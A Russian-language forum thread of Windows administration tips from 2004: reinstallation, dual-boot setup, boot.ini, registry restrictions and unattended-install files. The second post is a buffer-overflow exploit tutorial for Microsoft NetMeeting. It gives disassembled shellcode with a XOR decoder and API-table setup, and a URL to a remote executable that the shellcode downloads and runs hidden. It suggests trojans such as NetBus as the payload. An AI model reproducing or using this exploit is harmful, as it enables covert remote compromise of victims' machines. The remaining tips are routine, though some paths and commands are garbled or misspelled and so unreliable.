SUNUN Posted February 1, 2004 Report Share Posted February 1, 2004 Переустановка Windows Для установки используйте только каачественный дестрибутив, не берите диск у друзей, лучше свой, на случий переустановки. Я рекомендую использовать диски, у которых в загрузке есть дополнительные программы. Если у Вас были серьёзные проблемы с работой операционной системы, то лучше её не переустанавливать, а использовать "новую установку" (во время работы в реестре системы накапливаются ошибки. При обновлении системы ошибки сохраняются.) Устанавливать Windows необходимо из MS DOS: при установке из Windows правильно сконфигурировать систему практичкски невозможно. Для новой установки: Перезагрузите компьютер в MS DOS (лучше с загрузочного диска - для этого в BIOS в моём в Advanced BIOS Features> Fist Boot Device выберите CDROM Если загрузочного диска нет или CDROM не поддерживает загрузку с CD, то подойдёт и загрузочная дискета. Отформатируйте диск, содержащий папку Windows, команда format C: где С-имя диска. (при установке Windows98 вместо XP помните, что Windows98 не поддерживает NTFS, значит форматирования не избежать (преобразовывать не советую) в остальных случаях может быть достаточно стереть папку Windows, и фаилы уонфигуруции (см. советы) Для запуска установки введите F:setup.exe и нажмите Enter F- имя дисковвода CD дисков, или полный путь к программе установки на жёстком диске. Если программа установки при загрузке с дискеты не будет запускаться перейдите на диск "A" и введите "HELP" при помощи имеющегося там редактора найдите и откройте файл SETUP.EXE (установка Windows), выйдите из редактора и перейдите на диск с дистрибутивом Windows и допишите к возникшему пути srtup.exe и нажмите Enter. При установке Windows 2000,XP,... -пропишите путь к дестрибутиву, и введите winntsetup.exe Например C:WinXPI386>Winntus.exe Легче запускать установку из графической оболочки, такой, как Norton Comander. После проверки диска выберите папку для установки не C:WINDOWS, а какю-нибудь другую см.советы. и выполняйте указания на экране. Quote Link to post Share on other sites
SUNUN Posted February 1, 2004 Author Report Share Posted February 1, 2004 Переполнение буфера ПЕРЕПОЛНЕНИЕ БУФЕРА WIN32: БЕСПРЕДЕЛ Во все времена наши операционные системы страдали от ошибок Неосведомлённый мир Повернулся к Windows для безопасности от себя самих Но пришло время показать миру что мы все равны Использование переполнения буфера требует внимания, знаний, навыка и воображения. Мы не можем научить Вас всему вышеперечисленному. Но мы можем рассказать технологию построения собственных эксплоитов для переполнения буфера в windows 95,98,NT и 2000. Мы ставим своей целью скачать с сервера и запустить у жертвы какой-либо файл по нашему усмотрению без её ведома. Данный документ потребует от вас знакомства с -архитектурой процессоров x86, предпочтительно Pentium. -базовой архитектурой Windows (вы должны знать принцип построения формата PE-Exetuable. -Знать, что такое URL. -Иметь представление о языке C Так же вам потребуются следующие инструменты: Шестнадцатеричный редактор/просмотрищик кода, такой, как HIEW. Отладчик реального времени SoftIce. Некоторые из инструментов, поставляемых с Visual C++, например, Dumpenv. ОСНОВЫ Переполнение буфера возникнет, если что-то очень большое будет помещено в переменную меньше, чем необходимо. То, что не попало в переменную, попадёт в предсказуемое место памяти. Пример кода: void func(void) { int i; char buffer[256]; // * for(i=0;i>> В этом случае у Вас есть гораздо больше места для размещения Вашего собственного исполняемого кода. Как точно узнатьновое значение EIP, указывающее на ваш код? Берите в руки SoftICE, запускайте из-под него программу, которую ломаете и передайте ей строку, ведущую к переполнению. После сбоя вы увидите, что ESP (stack pointer) - единственный регистр, который показывает на адрес близкий к адресу нашего кода. Фактически, он указывает на адрес, где мы вышли за пределы положенного нам размера - EBP + 16 байт. Хорошо... что же мы будем делать? Нам надо перепрыгнуть через область, занятую стеком. То есть, как правило, будет достаточно перехода по адесу ESP. Более правильный путь - установить 0xZZYYXXWW в точку кода, где есть команда jmp esp или же call esp или что-то подобное. Но. в результате издержек компиляции, такая точка может оказаться в области, недоступной процессу, с бессмысленными адресами типа 0x00. Но, при анализе MSCONF32.DLL мы обнаружили наш код в сегменте 0x6A600000 смещение 2А76: .00002A76: 54 push esp .00002A77: 2404 and al,004 .00002A79: 33C0 xor eax,eax .00002A7B: 8A0A mov cl,[edx] .00002A7D: 84C9 test cl,cl .00002A7F: 740F je .000002A90 .00002A81: 80E930 sub cl,030 ;"0" .00002A84: 8D0480 lea eax,[eax][eax]*4 .00002A87: 0FB6C9 movzx ecx,cl .00002A8A: 42 inc edx .00002A8B: 8D0441 lea eax,[ecx][eax]*2 .00002A8E: EBEB jmps .000002A7B .00002A90: C20400 retn 00004 Непохоже, чтобы код начинался с jmp esp. Он возвращается к ESP. Выполняется PUSH ESP, затем JMPS 2A7B, поле этого переход JE 2A90 возвращает нас к RET'у. MSCONF.DLL загружен, он представлен одной версией для всех систем - соответственно адрес, куда на который мы передадим управление - 0x6A602A76. В этой строке нет ни нулей, ни возвратов каретки. Отлично. Мы переставили EIP. Процессор под нашим контролем. Пришло время рассказать о том, как мы будем строить код эксплоита, выполняемый после переполнения буфера. Можно заметить, что нам надо втиснуть всё в 763 байта, иначе сбой произойдёт в другом месте и код не исполнится. Это так же переполнение, но немного другое ;-) - у нас даже целых два бага для исследования. Первые 256 символов отбрасываются. Итак у нас есть 500 байт для нашего кода и неизвестная версия Windows. Так же нам неизвестны адреса функций API в NSCONF.DLL. Но для этого существует очень полезная процедура GetProcAddress. Мы найдём адрес этой процедуры, используя DUMPENV, поставляющийся вместе с VC++. Microsoft ® COFF Binary File Dumper Version 5.10.7303 Copyright © Microsoft Corp 1992-1997. All rights reserved. Dump of file msconf.dll File Type: DLL Section contains the following imports: KERNEL32.dll 23F Sleep 183 IsBadReadPtr 17E InterlockedIncrement . . . 1E CompareStringA 98 FreeLibrary 116 GetProcAddress 190 LoadLibraryA 4C DeleteCriticalSection 51 DisableThreadLibraryCalls . . . То, что надо ! GetProcAddress и LoadLibraryA. С помощью этих функций мы можем подгружать необходимые модули. Так же функции возвращают базовый адрес подгружаемого модуля. Итак, запускаем SoftIce и ищем адреса данных функций. Они будут 0x6A60107C (LoadLibraryA), и 0x6A601078 (GetProcAddress). Всё, что нам надо = вызвать их, используя неявный вызов (call dword ptr [0x6A60107C]) они сработают так, как надо нам. Теперь, чтобы сделать эксплоит как можно более маленьким в размере, нам надо -Знать таблицу функций, которые мы будем использовать -Запустить код, работающий с этой таблицей Это сильно уменьшит размер кода и минимизирует размер используемого стека. Это важно, поскольку если использовать чересчур много PUSH или POP, мы спаровоцируем ошибку в своём эксплоите или же создадим дополнительные проблемы со стеком. А чтобы построить таблицу адресов функций, надо наперёд знать, что мы будем использовать. Вообще, нам требуется заставить нашу маленькую програмку скачать и запустить нечно большее ;-) bo server или netbus, например. Кстати, подобным способом работал широко известный эксплоит от eeye. Чтобы загрузить URL, нам понадобятся функции InternetOpenA, InternetCloseHandle, InternetOpenUrlA, и InternetReadFile из библиотеки WININET.DLL. Так же понадобятся _lcreat, _lwrite, и _lclose из KERNEL32.DLL, чтобы записать на диск загруженный файл. GlobalAlloc понадобится, чтобы выделить место для загружаемого потока данных. WinExec и ExitProcess будут нужны, чтобы исполнить и завершить то, что наш эксплоит скачает с известного адреса и прибить RUNDLL32 до того, как он пикнет об ужасных вещах ;-). Заметьте, что в обычной порграмме под Win32 Вы никогда не встретите вызова _lcreat и прочих устаревших функций. Но, тем не менее, они существуют и никуда не делись даже из Windows 2000. СОЗДАНИЕ ТАБЛИЦЫ АДРЕСОВ ФУНКЦИЙ Нам требуется обратится к фунцкиям по имени. GetProcAddress обращается к вызываемой функции либо по номеру, либо по имени. Оканчивающемуся NULL'om. Но..увы, нам невозможно иметь нулевые байты в нашем эксплоите. Но...путём простейшего применения XOR'a или ADD'a ко всем байтам эксплоита, можно добиться отсутствия в нём досадных нулей. При его запуске, естественно, происходит обратная процедура. Так же этио всё-же мало-мальская шифровка - невооружённый глаз пьяного администратора не углядит ничего подозрительного в сторке кода. Всё же это не шифровка в обычном смысле этого слова - мы пытаемся заставить эксплоит работать... 00000270: .. .. .. .. .. .. .. 4B-45 52 4E 45-4C 33 32 00 KERNEL32 00000280: 5F 6C 63 72-65 61 74 00-5F 6C 77 72-69 74 65 00 _lcreat _lwrite 00000290: 5F 6C 63 6C-6F 73 65 00-57 69 6E 45-78 65 63 00 _lclose WinExec 000002A0: 45 78 69 74-50 72 6F 63-65 73 73 00-47 6C 6F 62 ExitProcess Glob 000002B0: 61 6C 41 6C-6C 6F 63 00-57 49 4E 49-4E 45 54 00 alAlloc WININET 000002C0: 49 6E 74 65-72 6E 65 74-4F 70 65 6E-41 00 49 6E InternetOpenA In 000002D0: 74 65 72 6E-65 74 43 6C-6F 73 65 48-61 6E 64 6C ternetCloseHandl 000002E0: 65 00 49 6E-74 65 72 6E-65 74 4F 70-65 6E 55 72 e InternetOpenUr 000002F0: 6C 41 00 49-6E 74 65 72-6E 65 74 52-65 61 64 46 lA InternetReadF 00000300: 69 6C 65 00-68 74 74 70-3A 2F 2F 77-77 77 2E 6C ile http://www.l 00000310: 30 70 68 74-2E 63 6F 6D-2F 7E 64 69-6C 64 6F 67 0pht.com/~dildog 00000320: 2F 65 61 74-6D 65 2E 65-78 65 00 .. .. .. .. .. /eatme.exe XOR'им всё это по 0x80, чтобы избавиться от нулевых байтов: 00000270: .. .. .. .. .. .. .. CB-C5 D2 CE C5-CC B3 B2 80 -+-++¦¦_З 00000280: DF EC E3 F2-E5 E1 F4 80-DF EC F7 F2-E9 F4 E5 80 __¶__Я_З_______З 00000290: DF EC E3 EC-EF F3 E5 80-D7 E9 EE C5-F8 E5 E3 80 __¶____З+__+°_¶З 000002A0: C5 F8 E9 F4-D0 F2 EF E3-E5 F3 F3 80-C7 EC EF E2 +°__-__¶___З¦___ 000002B0: E1 EC C1 EC-EC EF E3 80-D7 C9 CE C9-CE C5 D4 80 Я_-___¶З+++++++З 000002C0: C9 EE F4 E5-F2 EE E5 F4-CF F0 E5 EE-C1 80 C9 EE +_______-___-З+_ 000002D0: F4 E5 F2 EE-E5 F4 C3 EC-EF F3 E5 C8-E1 EE E4 EC ______+____+Я___ 000002E0: E5 80 C9 EE-F4 E5 F2 EE-E5 F4 CF F0-E5 EE D5 F2 _З+_______-___+_ 000002F0: EC C1 80 C9-EE F4 E5 F2-EE E5 F4 D2-E5 E1 E4 C6 _-З+_______-_Я_¦ 00000300: E9 EC E5 80-E8 F4 F4 F0-BA AF AF F7-F7 F7 AE EC ___З____¦»»___«_ 00000310: B0 F0 E8 F4-AE E3 EF ED-AF FE E4 E9-EC E4 EF E7 ____«¶__»_______ 00000320: AF E5 E1 F4-ED E5 AE E5-F8 E5 80 .. .. .. .. .. »_Я___ Итак, первая задача после успешного пуска - раскодировать всё это: 00000146: 33C9 xor ecx,ecx; обнулить ecx 00000148: B88053FF63 mov eax,063FF5380 ;"c_SЗ" 0000014D: 2C80 sub al,080 ;"З" 0000014F: C1C018 rol eax,018 Устаноить EAX на конец наших данных в памяти. 00000152: B1B4 mov cl,0B4 ;"¦" ECX установлен в 0x000000B4, количество байт, которые будем XORить. 00000154: 48 dec eax 00000155: 803080 xor b,[eax],080 ;"З" 00000158: E2FA loop 000000154 ---------- (1) Это и есть цикл, раскодируюий наши данные. УСТАНОВКА ТАБЛИЦЫ ФУНКЦИЙ 0000015A: BE7C10606A mov esi,06A60107C 0000015F: 50 push eax 00000160: 50 push eax 00000161: FF16 call d,[esi] 00000163: 8BF0 mov esi,eax Этот код вызывает LoadModule. EAX есть первый аргумент этой функции, который указывает на строку "KERNEL32", После отработки LoadModule, в EAX будет хэндл модуля ядра, который мы сохраняем в ESI, чтобы он не был затёрт другими процедурами. 00000165: 5B pop ebx 00000166: 8BFB mov edi,ebx 00000168: 6681EF4BFF sub di,0FF4B ;"_K" Этот код установит EDI в начало нашей таблицы, которая начинается через 181 байт после начал таблицы строк, раскодированной нами ранее. 0000016D: FC cld 0000016E: 33C9 xor ecx,ecx 00000170: 80E9FA sub cl,-006 Мы собираемся запустить цикл 6 раз, чтоб вызвать по очереди все нужные нам процедуры. Устанавливаем счётчик ( ECX ) в 6. 00000173: 43 inc ebx 00000174: 32C0 xor al,al 00000176: D7 xlat 00000177: 84C0 test al,al 00000179: 75F8 jne 000000173 ---------- (1) 0000017B: 43 inc ebx Этот цикл проверяет текст на нули (другими словами, вычленяя из него отдельные строки - имена функций), и устанавливает EBX на адрес символа, идущего после нулевого байта. Это перемещает нас от одного имети процедуры к другому. Обратите внимание на рациональное ( 31337ное ) использование xlat'a - вся ссылка на область памяти в одном байте ;-). 0000017C: 51 push ecx 0000017D: 53 push ebx 0000017E: 56 push esi 0000017F: FF157810606A call d,[06A601078] 00000185: AB stosd 00000186: 59 pop ecx Этот код возвращает адреса функций и пишет их в EDI. 00000187: E2EA loop 000000173 ---------- (2) Итак, это конец цикла процедуры определения адресов функций из ядра. Теперь проделаем то же самое для модуля WININET: 00000189: 43 inc ebx 0000018A: 32C0 xor al,al 0000018C: D7 xlat 0000018D: 84C0 test al,al 0000018F: 75F8 jne 000000189 ---------- (2) 00000191: 43 inc ebx Сдвигаем указатель на имя библиотеки с строке WININET 00000192: 53 push ebx 00000193: 53 push ebx 00000194: FF157C10606A call d,[06A60107C] 0000019A: 8BF0 mov esi,eax 0000019C: 90 nop 0000019D: 90 nop 0000019E: 90 nop 0000019F: 90 nop Этот код пишет хэндл WININET'a в ESI. NOPы остались после отладки. 000001A0: 33C9 xor ecx,ecx 000001A2: 83E9FC sub ecx,-004 000001A5: 43 inc ebx 000001A6: 32C0 xor al,al 000001A8: D7 xlat 000001A9: 84C0 test al,al 000001AB: 75F8 jne 0000001A5 000001AD: 43 inc ebx 000001AE: 51 push ecx 000001AF: 53 push ebx 000001B0: 56 push esi 000001B1: FF157810606A call d,[06A601078] 000001B7: AB stosd 000001B8: 59 pop ecx 000001B9: E2EA loop 0000001A5 Всё ! Таблица адресов функций построена ! Мы можем вызывать их, когда захотим ;-) Теперь напишем собственно процедуру скачки файла и его запуска. 000001BB: 90 nop 000001BC: 90 nop 000001BD: 33C0 xor eax,eax 000001BF: 6648 dec ax 000001C1: D1E0 shl eax,1 000001C3: 33D2 xor edx,edx 000001C5: 50 push eax 000001C6: 52 push edx 000001C7: FF57EC call d,[edi][-0014] 000001CA: 8BF0 mov esi,eax Выделяем 131070 байт памяти. Количество требуемых байт в EAX, и затем мы вызываем неявно функцию GlobalAlloc, адрес которой берём из построенной таблицы. Адрес начала выделенной нам области хранится теперь в ESI. 000001CC: 33D2 xor edx,edx 000001CE: 52 push edx 000001CF: 52 push edx 000001D0: 52 push edx 000001D1: 52 push edx 000001D2: 57 push edi 000001D3: FF57F0 call d,[edi][-0010] Создаём хэндл Internet, вызывая функцию InternetOpenA. Передаваемые параметры - нули, о них можно не беспокоиться. Сам хэндл будет возвращён нам в EAX, и мы передадим его нашеё следующей функции. 000001D6: 33D2 xor edx,edx 000001D8: 52 push edx 000001D9: 52 push edx 000001DA: 52 push edx 000001DB: 90 nop 000001DC: 52 push edx 000001DD: 8BD7 mov edx,edi 000001DF: 83EA50 sub edx,050 ;"P" 000001E2: 90 nop 000001E3: 90 nop 000001E4: 90 nop 000001E5: 52 push edx 000001E6: 50 push eax 000001E7: FF57F8 call d,[edi][-0008] Этот код вызовет InternetOpenUrlA (по таблице [EDI-0x08]), открывая наш URL... тип - какой угодно, HTTP, FTP, FILE, GOPHER... 000001EA: 57 push edi 000001EB: 33D2 xor edx,edx 000001ED: 664A dec dx 000001EF: D1E2 shl edx,1 000001F1: 52 push edx 000001F2: 56 push esi 000001F3: 50 push eax 000001F4: FF57FC call d,[edi][-0004] Запускаем InternetReadFile (по таблице - [EDI-0x04]), и загружаем наши 131070 байт в буфер на начало которого указывает ESI (1331070 байт). Но сначала мы сохранили в стеке EDI. Мы используем его как счётчик скачанных байт. Это поможет нам при проверке - всё ли удачно мы слили с сайта ? 000001F7: 90 nop 000001F8: 90 nop 000001F9: 90 nop 000001FA: 33D2 xor edx,edx 000001FC: 52 push edx 000001FD: 8BD7 mov edx,edi 000001FF: 83EA30 sub edx,030 ;"0" 00000202: 42 inc edx 00000203: 90 nop 00000204: 90 nop 00000205: 52 push edx 00000206: FF57D8 call d,[edi][-0028] Вызвали _lcreat (по адресу в таблице [edi-0x28]), чтобы переписать скачанный буфер в файл. Файл создаётся в директории, которая является текущей для юзера (в нашем случае - файл e.exe создастся в папке SpeedDial Netmeeting'a). 00000209: FF37 push d,[edi] 0000020B: 56 push esi 0000020C: 50 push eax 0000020D: 8BD8 mov ebx,eax 0000020F: FF57DC call d,[edi][-0024] Вызов _lwrite (адрес из таблицы [edi-0x24]). Параметр - сколько байт записать на диск. Файл создан - осталось его закрыть. 00000212: 53 push ebx 00000213: FF57E0 call d,[edi][-0020] Закрыли. Лайнер готов, подан трап и контроль позади... 00000216: 90 nop 00000217: 90 nop 00000218: 90 nop 00000219: 33D2 xor edx,edx 0000021B: 42 inc edx 0000021C: 52 push edx 0000021D: 8BD7 mov edx,edi 0000021F: 83EA30 sub edx,030 ;"0" 00000222: 42 inc edx 00000223: 90 nop 00000224: 90 nop 00000225: 52 push edx 00000226: FF57E4 call d,[edi][-001C] Вызвали WinExec, указав ему исполнить файл. Заметьте - первый inc edx предназначен, чтобы определить, будет ли показано окно (SW_SHOWNORMAL) или же не будет (SW_HIDE). Вы выбираем второй вариант. А первый параметр функции - имя файла. 00000229: 90 nop 0000022A: 90 nop 0000022B: 90 nop 0000022C: FF57E8 call d,[edi][-0018] ПУСК! Наш процесс заработал ! Итак, мы вкратце пояснили принципы действия overflow-эксплоитов для windows всех версий и привели рабочий код эксплоита для Microsoft NetMeeting. Кстати, подобным образом работал и overflow-эксплоит от eeye. А для совсем ленивых - готовый файлик exploit.cnf, содержащий вышепоказанный код. Работайте, смотрите, учитесь. Quote Link to post Share on other sites
SUNUN Posted February 1, 2004 Author Report Share Posted February 1, 2004 Как удалить XP с диска без потери данных? Hадо вернуться на Win9x. Если XP стоял на NTFS, сначала нужно cконвертировать диск в FAT32. Для этого можно воспользоваться программой Partition Magic фирмы Power Quest. Затем создаем загрузочную дискету нужной версии Win9x, копируем на неё файлы fdisk.com, sys.com и загружаемся с неё. Выполняем команды fdisk /mbr и sys a: c: После этого удаляем директорию /Windows и файлы из корневого каталога, имеющие отношение к XP - ntldr, boot.ini и т.д Quote Link to post Share on other sites
SUNUN Posted February 1, 2004 Author Report Share Posted February 1, 2004 Установка Windows NT из-под Windows 9x Если Вы хотите установить Windows NT при установленной Windows 95, то запустите DOS-сессию (command.com) и дайте команду LOCK. Это включит прямой доступ к диску, который нужен для программы установки NT. Также нужно помнить, что в этом случае надо запускать winnt.exe, а не winnt32. Quote Link to post Share on other sites
SUNUN Posted February 1, 2004 Author Report Share Posted February 1, 2004 Установка Windows 2000/XP и Windows 9x на одном компьютере Если вы хотите установить на компьютер Windows 9x и Windows 2000/XP, то следует сначала установить Windows 9x, а затем из-под неё запустить setup.exe из дистрибутива Windows 2000/XP и выполнить установку в другой каталог, а лучше на другой раздел, иначе, например, Outlook Express и Internet Explorer нормально работать в Windows 9x не будут. После этого при загрузке компьютера у вас будет появляться меню выбора операционной системы. Если устанавливать в обратном порядке, то Windows 9x при инсталляции затирает загрузочный сектор Windows 2000/XP. Однако эту проблему можно решить. Перед установкой Windows 9x нужно в файле MSBATCH.INF из дистрибутива (если такого файла в вашем дистрибутиве нет, создайте его) прописать следующие строки: [setup] CleanBoot=0 Если дистрибутив Windows 9x находится на CD (как это обычно и бывает), то скопируйте (или создайте) MSBATCH.INF на винчестер и отредактируйте там, а затем запустите программу установки Windows 9x, указав в качестве параметра полный путь к данному файлу, например: setup.exe C:\MSBATCH.INF В данном случае файл можно назвать как угодно, а не только MSBATCH.INF. После установки может понадобиться прописать Windows 9x в стартовом меню Windows 2000/XP, добавив следующую строку в раздел [operating systems] файла boot.ini: C:\="Microsoft Windows 98" где текст в кавычках — это то, что будет выводиться в загрузочном меню выбора ОС. В корне системного диска необходим файлик bootsect.dos, который содержит загрузочный сектор Windows 9x. Если этот файл по какой-то причине не создался, то придётся пойти другим путём. 1. Устанавливаем Windows 9x в нормальном режиме, чтобы она перезаписала загрузочный сектор. 2. Сохраняем его (первый сектор раздела (512 байт), на котором установили Windows 9x) в файл под именем bootsect.dos с помощью Norton DiskEdit или, например, программы BOOTPART. 3. Загружаемся в программу инсталляции Windows 2000/XP, выбираем там ремонтировать текущую инсталляцию с помощью Recovery Console. 4. Восстанавливаем загрузочный сектор Windows 2000/XP командой fixboot. 5. Загружаемся в Windows 2000/XP и прописываем Windows 9x в стартовое меню в boot.ini Quote Link to post Share on other sites
SUNUN Posted February 1, 2004 Author Report Share Posted February 1, 2004 Организация загрузки некольких операционных систем с помощью загрузчика Windows 2000 С помощью загрузчика Windows 2000 можно организовать загрузку и более двух ОС. Для этого надо получить загрузочные сектора дополнительных операционных систем в виде файлов и прописать их в boot.ini, например, так: C:\bootsect.dos="Windows 98" C:\bootsect.lnx="Linux" Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Форматирование первого раздела диска при сохранении Windows 2000, установленной на другом разделе. Если требуется отформатировать первый раздел диска, не потеряв возможность загрузки Windows 2000, установленной на другом разделе, то поступить следует так. Перед форматированием сохраните файлы из корневого каталога первого раздела, нужные для загрузки Windows 2000: ntldr — загрузчик boot.ini — конфигурационный файл загрузчика ntdetect.com — собирает информацию об устройствах ntbootdd.sys — нужен только при наличии SCSI bootfont.bin — шрифт, нужен только для локализованной версии bootsect.dos — файл с загрузочным сектором альтернативной ОС. После форматирования раздела скопируйте все эти файлы обратно, загрузитесь в Recovery Console Windows 2000 и восстановите загрузочный сектор Windows 2000 командой fixboot. Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Способ установки Windows NT при проблеме на стадии детектирования оборудования Если установка останавливается на стадии "detecting the hardware" (детектирования оборудования), то можно попробовать использовать DEBUG-версию программы NTDETECT.COM. В папке SUPPORT на CD с дистрибутивом Windows NT находится файл NTDETECT.CHK, для его применения следуйте инструкции: 1. С помощью команды Diskcopy создайте копию первого инсталляционного диска: diskcopy a: a: /v 2. Скопируйте NTDETECT.CHK из папки SUPPORT дистрибутива на созданный диск: copy d:\support\ntdetect.chk a:ntdetect.com 3. Запустите установку с нового диска — процесс обнаружения оборудования будет выводиться на экран (сразу будет ясно, где грабли...) Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как настроить IPv6 под ХР? В XP уже встроена поддержка этого протокола, но она нигде не отражена в интерфейсе. Для его установки IPv6 достаточно набрать в командной строке install ipv6. Не переживайте, на текущие настройки TCP/IP это не окажет никакого влияния. Настройка IPv6 производится из командной строки, что бы узнать про это подробнее, просто введите ipv6 /? Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как спрятать имя пользователя из Welcome Screen? Это может пригодится, например, когда на компьютере прописан пользователь, который никогда не логинится локально, только по сети. Для того что бы убрать пользователя из списка доступных пользователей нужно в реестре по адресу HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList\\\\ добавить ключ типа REG_DWORD соответствующий имени пользователя. Присвоив этому ключу значение 1 мы разрешим показывать этого пользователя в Welcome Screen, а 0 запретим. Несмотря на то что пользователя не видно, им всё равно можно залогиниться. Для этого дважды нажимаем Crtl+Alt+Del, открывается классическое окно логона, вводим имя, пароль, и логинимся Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Долго открываются папки с большим количеством файлов (NTFS) Когда открывается директория, то NTFS обновляет метку последнего доступа к файлам. Если файлов много и на всех надо метку обновить, то это занимает довольно много времени. Однако эту функцию можно отключить. Для этого запускаем Regеdit и по адресу HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Control -> FileSystem cоздаём ключ типа DWORD под названием NtfsDisableLastAccessUpdate, после чего ставим его в 1 Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как назначить конкретные права доступа к файлам и папкам в XP Home? B XP Home Simple File Sharing отключить нельзя, и никаких средств для этого в GIU XP Home нет. Но утилика для командной строки, которая это делает, есть. Для того что бы узнать как она работает, достаточно набрать в командной строке cacls. Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как создать команду,применяемую к незарегистрированным типам файлов. Например: вы частенько сталкивались с файлами типа readme.!!!. Согласитесь довольно нудно открывать их с помощью диалога "Открыть с помощью…" HKEY_CLASSES_ROOT\ *\ Shell\ Open\ Command = "Notepad "%1"" Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как заменить программу блокнот на другую программу. HKEY_CLASSES_ROOT\ Txtfile\ Shell\ Open\ Command = "C:\ Windows\ notepad "%1"" так в оригинале. Замените notepad на др. программу, только укажите полный путь к ней. Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как скрыть значки логических дисков. HREY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создать парметр DWORD NoDrives. Установите следующие значения для скрытия дисков (значения в шестнадцатеричной системе): A:+B: = 3 C: = 4 D: = 8 E: = 10 F: = 20 A+B+C=7 A+B+D=b A+B+E=13 A+B+F=23 C+D=c D+E=18 и т.д. Скрыть все значки = 0x03ffffff Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Как скрыть все значки с рабочего стола. HREY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создать параметр DWORD NoDesktop =1 (=0 - все значки видны) Quote Link to post Share on other sites
SUNUN Posted February 2, 2004 Author Report Share Posted February 2, 2004 Запрещение различных установок и настроек Windows с помощью реестра 1. Как ограничить доступ к программам. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создайте раздел RestricRun. В этом разделе создайте параметры с именами 1, 2, 3 и т.д., которые должны содержать пути и имена программ. Доступ для пользователя разрешен будет только к тем программам, которые описаны таким образом. Для разрешения доступа удалите раздел RestricRun. Внимание: Будьте внимательны и аккуратны! А еще лучше всего научитесь восстанавливать реестр в режиме MS-DOS !!! Если в системе существует всего один пользователь и вы не укажите в списке разрешенных программ редактор реестра, то вы не сможете запускать больше никакие программы, кроме указанных в списке. 2. Как ограничить доступ к редактору реестра. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System создайте параметр DisableRegistryTools = 1 - доступ закрыт, 0 - открыт. 3. Как запретить вызов контекстного меню. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создайте параметр NoViewContextMenu = 1 - контекстное меню запрещено, 0 - разрешено. 4. Как запретить появление всплывающих подсказок. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ Advanced\ создайте параметр ShowInfoTip = 1 - запрещено, 0 - нет. 5. Как запретить команды в меню Пуск. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer если параметр имеет равен 1, то команда запрещена, 0 - разрешена NoTrayContextMenu - запретить контекстное меню панели задач NoRecentDocsHistory - не помнить недавно открытых документов ClearRecentDocsOnExit - очищать список недавно открытых документов при выходе NoSetActiveDesktop - удалить пункт Рабочий стол Active Desktop из подменю Настройка NoChangeStartMenu - запретить контекстное меню в меню Пуск NoStartMenuSubfolders- скрыть подкаталоги в меню Пуск. 6. Как запретить сеанс MS-DOS. HKEY_CURRENT_USER\Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ WinOldApp создайте параметр Disable = 1 - запрещен, 0 -разрешен. 7. Как запретить перезагрузку в режиме MS-DOS. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ WinOldApp создайте параметр NoRealMode = 1 - запрещен, 0 -разрешен. 8. Как ограничить доступ к настройкам принтера. HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer если параметр имеет равен 1, то команда запрещена, 0 - разрешена NoDeletePrinter - запрет на удаление принтера NoPrinterTabs - скрыты закладки в диалоге Свойства: принтер NoAddPrinter - запрет на добавление принтера Quote Link to post Share on other sites
SUNUN Posted February 3, 2004 Author Report Share Posted February 3, 2004 Ускорение файловой системы Ускорение файловой системы (Windows NT/2000/XP) Можно ускорить действие файловой системы, (если позволяет оперативная память) увеличив параметр типа DWORD IoPageLockLimit в разделе HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management от заданных по умолчанию 512 КБ до 4 МБ и более. Этот параметр представляет максимальное число байт, которые могут быть блокированы для операций I/O. Когда значение параметра равно 0, то система использует встроенный алгоритм определения необходимой памяти и использует объем 512 КБ. Установка максимального значения должна основываться на объеме памяти в Вашей системе. Таблица рекомендуемых значений RAM (MB) IoPageLockLimit 32 4096000 64 8192000 128 16384000 256+ 65536000 Quote Link to post Share on other sites
SUNUN Posted February 3, 2004 Author Report Share Posted February 3, 2004 Установка Windows(хитрости) Я часто экспериментирую над виндой и поэтому она у меня часто слетает. Даже Точки Восстановления системы не помогают )) И в результате прихо- дится все ставить заново. Но надоедает постоянно прописывать одни и те же настройки типа Язык, Региональные стандарты, Серийник, который не всегда удается вспомнить с первого раза. Я задумался как это автоматизировать. Долго думать не пришлось, Я вспомнил, что в Win98 был такой файлик unnated.txt в котором можно было прописать все настройки и идти пить пиво. В Win 2000/XP/2003 он тоже нашелся. Итак: [unattended] UnattendMode=FullUnattended ! OemSkipEula=Yes OemPreInstall=Yes OemPnDriversPath="driversIntelINF" TargetPath=WINNT FileSystem=ConvertNTFS ComputerType="Advanced Configuration And Power Interface (ACPI) PC" [GuiUnattended] AdminPassword=YourPassword AutoLogonCount=1 OEMSkipRegional=1 TimeZone=125 OemSkipWelcome=1 [userData] FullName="VasyaPupkin" 